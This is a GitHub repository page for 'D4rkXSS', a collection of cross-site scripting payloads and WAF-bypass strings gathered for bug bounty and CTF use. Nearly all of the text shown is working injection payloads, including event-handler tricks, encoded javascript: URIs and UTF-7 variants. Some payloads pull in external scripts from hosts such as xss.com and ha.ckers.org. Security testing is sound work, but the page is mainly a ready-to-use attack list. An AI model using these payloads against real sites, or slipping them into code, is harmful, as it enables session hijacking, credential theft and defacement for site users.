Skip to content
A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF
Branch: master
Clone or download
Latest commit 2ba9627 Oct 17, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE License.md Sep 30, 2019
Misc.md Update Misc.md Sep 30, 2019
Polygot.md Update Oct 17, 2019
README.md Update Readme.md Sep 30, 2019
basicxss.txt All files Sep 30, 2019
brutelogic.txt All files Sep 30, 2019
fuzz.txt All files Sep 30, 2019
image.png Add files via upload Sep 30, 2019
jhaddix.txt All files Sep 30, 2019
mario.txt All files Sep 30, 2019
noscript.txt All files Sep 30, 2019
rsnake.txt All files Sep 30, 2019
seXSS.md Update seXSS.md Sep 30, 2019

README.md

D4rkXSS



All in one place for XSS.
R0X4R

Contribution

This is an open source repo. Anyone can contribute. 🍻
Coffee

Bypass WAF

NO SCRIPT

  • For Example:
  • <acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    <xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
    

    Brutelogic

  • For Example:
  • \'-alert(1)//
    </script><svg onload=alert(1)>
    <x contenteditable onblur=alert(1)>lose focus!
    

    Fuzz3r

  • For Example:
  • #getURL,javascript:alert(1)",
    #goto,javascript:alert(1)",	
    ?javascript:alert(1)",
    
    

    IMG Error

  • Encoding
  • <img onerror="location='javascript:=lert(1)'" src="x">
    <img onerror="location='javascript:%61lert(1)'" src="x">
    <img onerror="location='javascript:\x2561lert(1)'" src="x">
    <img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
    

    Jhaddix

    Jhaddix

  • For Example:
  • '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
    <<scr\0ipt/src=http://xss.com/xss.js></script
    %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
    ' onmouseover=alert(/Black.Spook/)
    
    

    RSnake

    RSnake

  • For Example:
  • <SCRIPT>alert('XSS');</SCRIPT>
    '';!--"<XSS>=&{()}
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
    
    

    MarioXSS

    Mario

  • For Example:
  • <div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>
    

    Search Engine XSS

    seXSS

    Misc Payloads

    Misc

    Basic Payloads

    Basic

  • For Example:
  • <script>alert('1')</script>
    "><script>alert('1')</script>
    <svg/onload=alert('1');
    
    You can’t perform that action at this time.